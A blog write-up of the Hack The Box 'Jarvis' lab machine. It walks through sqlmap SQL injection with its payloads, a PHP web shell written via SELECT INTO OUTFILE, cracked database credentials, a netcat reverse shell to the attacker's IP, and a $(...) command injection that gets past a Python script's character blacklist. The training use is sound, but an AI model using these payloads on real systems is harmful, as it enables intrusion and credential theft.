Hack The Box Jarvis Writeup – 10.10.10.143

Hack The Box Jarvis is based on the SQL injection vulnerability in the hotel room booking web application. WAF, SQL injection, systemctl, and SUID root are the keys to root this machine.

As like anyother machine I add the IP 10.10.10.143 as jarvis.htb to the etc/hosts

Lets start with nmap port scanning.

 ⚡ ⚙  root@ns09 ~/htb/jarvis nmap -sC -sV -p- jarvis.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 14:29 +03
Nmap scan report for jarvis.htb (10.10.10.143)
Host is up (0.024s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are a couple of ports open: 22, 80 and 64999. The port 22 hosts an SSH, 80 an Apache httpd web server that runs our main target Hotel Room Booking Application and the port 64999 hosts another Apache server – this port seems to be banning whoever visits for 90 seconds.

PORT 80:

PORT: 64999

I started to enumerate the directories to find something useful using Dirbsuter. I found a lot of directories, I started analyzing them “one by one” until I decided to do an SQLi on the back-end SQL DB. Some users in the Jarvis forum posts say the room.php is the SQLi point, so I start the start the SQLMAP.

 ⚡ ⚙ root@ns09 ~/htb/jarvis sqlmap -u http://jarvis.htb/room.php\?cod\=1 -p cod
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:29:18 /2019-11-18/

[16:29:19] [INFO] testing connection to the target URL
[16:29:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[16:29:20] [INFO] testing if the target URL content is stable
[16:29:21] [INFO] target URL content is stable
[16:29:21] [WARNING] heuristic (basic) test shows that GET parameter 'cod' might not be injectable
[16:29:22] [INFO] testing for SQL injection on GET parameter 'cod'
[16:29:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:29:24] [INFO] GET parameter 'cod' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="of")
[16:29:26] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[16:30:11] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:30:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:30:11] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:30:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:30:11] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:30:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:30:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:30:12] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:30:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:30:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:30:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:30:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:30:12] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:30:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[16:30:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[16:30:13] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:30:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[16:30:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[16:30:14] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[16:30:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[16:30:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[16:30:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:30:14] [INFO] testing 'MySQL inline queries'
[16:30:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[16:30:15] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:30:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[16:30:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[16:30:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[16:30:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[16:30:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:30:26] [INFO] GET parameter 'cod' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[16:30:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:30:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:30:26] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:30:27] [INFO] target URL appears to have 7 columns in query
[16:30:30] [INFO] GET parameter 'cod' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'cod' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 5750=5750

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 5829 FROM (SELECT(SLEEP(5)))UakE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-4520 UNION ALL SELECT NULL,NULL,CONCAT(0x716b707171,0x435465546e7a7764534e7877457043504c4362537255516159586c66615154756d51617254794d6c,0x716b767a71),NULL,NULL,NULL,NULL-- KhJh
---
[16:51:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[16:51:41] [INFO] fetched data logged to text files under '/root/.sqlmap/output/jarvis.htb'

[*] ending @ 16:51:41 /2019-11-18/

 ⚡ ⚙ root@ns09~/htb/jarvis 

The SQLi is confirmed from the above scan. I know know that the following SQLi are possible on this machine.

Possible SQLi as per sqlmap scan report:

sqlmap command: sqlmap -u http://jarvis.htb/room.php?cod=1 -p cod –delay 2 –random-agent –os-pwn

Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 5750=5750

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 5829 FROM (SELECT(SLEEP(5)))UakE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-4520 UNION ALL SELECT NULL,NULL,CONCAT(0x716b707171,0x435465546e7a7764534e7877457043504c4362537255516159586c66615154756d51617254794d6c,0x716b767a71),NULL,NULL,NULL,NULL-- KhJh

I’m going to use –os-pwn option in the sqlmap, this will give me the shell directly.

 ⚡ ⚙  root@ns09  ~/htb/jarvis  sqlmap -u http://jarvis.htb/room.php\?cod\=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.10#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:54:20 /2019-11-18/

[19:54:20] [INFO] resuming back-end DBMS 'mysql' 
[19:54:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 5750=5750

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 5829 FROM (SELECT(SLEEP(5)))UakE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-4520 UNION ALL SELECT NULL,NULL,CONCAT(0x716b707171,0x435465546e7a7764534e7877457043504c4362537255516159586c66615154756d51617254794d6c,0x716b767a71),NULL,NULL,NULL,NULL-- KhJh
---
[19:54:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[19:54:21] [INFO] going to use a web backdoor for command prompt
[19:54:21] [INFO] fingerprinting the back-end DBMS operating system
[19:54:22] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[19:54:24] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /var/www/html
[19:55:05] [INFO] retrieved web server absolute paths: '/images/'
[19:55:05] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[19:55:06] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://jarvis.htb:80/tmpuzqye.php
[19:55:07] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://jarvis.htb:80/tmpbnmmp.php
[19:55:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] a
command standard output: 'www-data'
os-shell> id
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> 

I actually found another easy way to get the shell using --passwords option to dump the users password hashes from the database.

 ⚡ ⚙ root@ns09~/htb/jarvis sqlmap -u http://jarvis.htb/room.php\?cod\=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" --passwords
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.10#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:58:22 /2019-11-18/

[19:58:23] [INFO] resuming back-end DBMS 'mysql' 
[19:58:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 5750=5750

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 5829 FROM (SELECT(SLEEP(5)))UakE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-4520 UNION ALL SELECT NULL,NULL,CONCAT(0x716b707171,0x435465546e7a7764534e7877457043504c4362537255516159586c66615154756d51617254794d6c,0x716b767a71),NULL,NULL,NULL,NULL-- KhJh
---
[19:58:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[19:58:24] [INFO] fetching database users password hashes
[19:58:25] [INFO] used SQL query returns 1 entry
[19:58:25] [INFO] used SQL query returns 1 entry
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:58:51] [INFO] writing hashes to a temporary file '/tmp/sqlmap_A8gTj4252/sqlmaphashes-fLOK8z.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[19:58:56] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[19:59:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[19:59:10] [INFO] starting dictionary-based cracking (mysql_passwd)
[19:59:10] [INFO] starting 2 processes 
[19:59:40] [INFO] cracked password 'imissyou' for user 'DBadmin'                                                                                                                                                                             
database management system users password hashes:                                                                                                                                                                                            
[*] DBadmin [1]:
    password hash: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
    clear-text password: imissyou

[20:00:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/jarvis.htb'

[*] ending @ 20:00:39 /2019-11-18/

 ⚡ ⚙ root@ns09 ~/htb/jarvis 

So I now have the user DBadmin and his password imissyou I can now use these credentials to login to phpmyadmin .

Now I’m going to try using the SQL console to get a web shell

SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/sh3ll.php"

I’m going to use the OpenBSD Shell from PayloadsAllTheThings to get the reverse shell

Link: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-openbsd

Command:

http://jarvis.htb/sh3ll.php?c=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.9%204444%20%3E%2Ftmp%2Ff

Before running the command, I opened another terminal and ran the netcat.

www-data@jarvis:/var/www/html$ export TERM=screen
www-data@jarvis:/var/www/html$ 

User.txt

I found the user.txt in the home directory, however I wasnt able to read it as www-data has no rights to open it. I noticed there is a user pepper will be able to do this job

www-data@jarvis:/var/www/html$ cd /home/
www-data@jarvis:/home$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 Mar  2  2019 .
drwxr-xr-x 23 root   root   4096 Mar  3  2019 ..
drwxr-xr-x  4 pepper pepper 4096 Mar  5  2019 pepper
www-data@jarvis:/home$ cd pepper/
www-data@jarvis:/home/pepper$ ls -al
total 32
drwxr-xr-x 4 pepper pepper 4096 Mar  5  2019 .
drwxr-xr-x 3 root   root   4096 Mar  2  2019 ..
lrwxrwxrwx 1 root   root      9 Mar  4  2019 .bash_history -> /dev/null
-rw-r--r-- 1 pepper pepper  220 Mar  2  2019 .bash_logout
-rw-r--r-- 1 pepper pepper 3526 Mar  2  2019 .bashrc
drwxr-xr-x 2 pepper pepper 4096 Mar  2  2019 .nano
-rw-r--r-- 1 pepper pepper  675 Mar  2  2019 .profile
drwxr-xr-x 3 pepper pepper 4096 Mar  4  2019 Web
-r--r----- 1 root   pepper   33 Mar  5  2019 user.txt
www-data@jarvis:/home/pepper$ cat user.txt 
cat: user.txt: Permission denied
www-data@jarvis:/home/pepper$ 
www-data@jarvis:/home/pepper$ sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/home/pepper$ 
www-data@jarvis:/home/pepper$ sudo -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************


********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP
    
www-data@jarvis:/home/pepper$ 

The simpler.py:

www-data@jarvis:/home/pepper$ cat /var/www/Admin-Utilities/simpler.py
#!/usr/bin/env python3
from datetime import datetime             
import sys               
import os 
from os import listdir               
import re        
def show_help():         
    message='''
********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]
Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP                
    '''     
    print(message)

def show_header():
    print('''***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
***********************************************                   
''')
def show_statistics():
    path = '/home/pepper/Web/Logs/'
    print('Statistics\n-----------')
    listed_files = listdir(path)
    count = len(listed_files)
    print('Number of Attackers: ' + str(count))
    level_1 = 0
    dat = datetime(1, 1, 1)
    ip_list = []
    reks = []
    ip = ''
    req = ''
    rek = ''
    for i in listed_files:
        f = open(path + i, 'r')
        lines = f.readlines()
        level2, rek = get_max_level(lines)
        fecha, requ = date_to_num(lines)
        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if fecha > dat:
            dat = fecha
            req = requ
            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if int(level2) > int(level_1):
            level_1 = level2
            ip_list = [ip]
            reks=[rek]
        elif int(level2) == int(level_1):
            ip_list.append(ip)
            reks.append(rek)
        f.close()

    print('Most Risky:')
    if len(ip_list) > 1:
        print('More than 1 ip found')
    cont = 0
    for i in ip_list:
        print('    ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])
        cont = cont + 1

    print('Most Recent: ' + ip2 + ' --> ' + str(dat) + ' ' + req)

def list_ip():
    print('Attackers\n-----------')
    path = '/home/pepper/Web/Logs/'
    listed_files = listdir(path)
    for i in listed_files:
        f = open(path + i,'r')
        lines = f.readlines()
        level,req = get_max_level(lines)
        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)                                                                             
        f.close()

def date_to_num(lines):
    dat = datetime(1,1,1)
    ip = ''
    req=''
    for i in lines:
        if 'Level' in i:
            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('\n')[0]
            regex = '(\d+)-(.*)-(\d+)(.*)'
            logEx=re.match(regex, fecha).groups()
            mes = to_dict(logEx[1])
            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]
            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
            if fecha > dat:
                dat = fecha
                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]
    return dat, req

def to_dict(name):
    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}                                                          
    return month_dict[name]

def get_max_level(lines):
    level=0
    for j in lines:
        if 'Level' in j:
            if int(j.split(' ')[4]) > int(level):
                level = j.split(' ')[4]
                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]
    return level, req

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    if sys.argv[1] == '-h' or sys.argv[1] == '--help':
        show_help()
        exit()
    elif sys.argv[1] == '-s':
        show_statistics()
        exit()
    elif sys.argv[1] == '-l':
        list_ip()
        exit()
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()
www-data@jarvis:/home/pepper$

The next step was to run the script

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: $(/dev/shm/shell.sh)
$(/dev/shm/shell.sh)

I now have the shell as “pepper”

# nc -lvnp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:38924.
id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
python -c 'import pty;pty.spawn("/bin/bash")'
pepper@jarvis:/var/www$ cd
cd
pepper@jarvis:~$ ls
pepper@jarvis:~$ cat user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxx

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.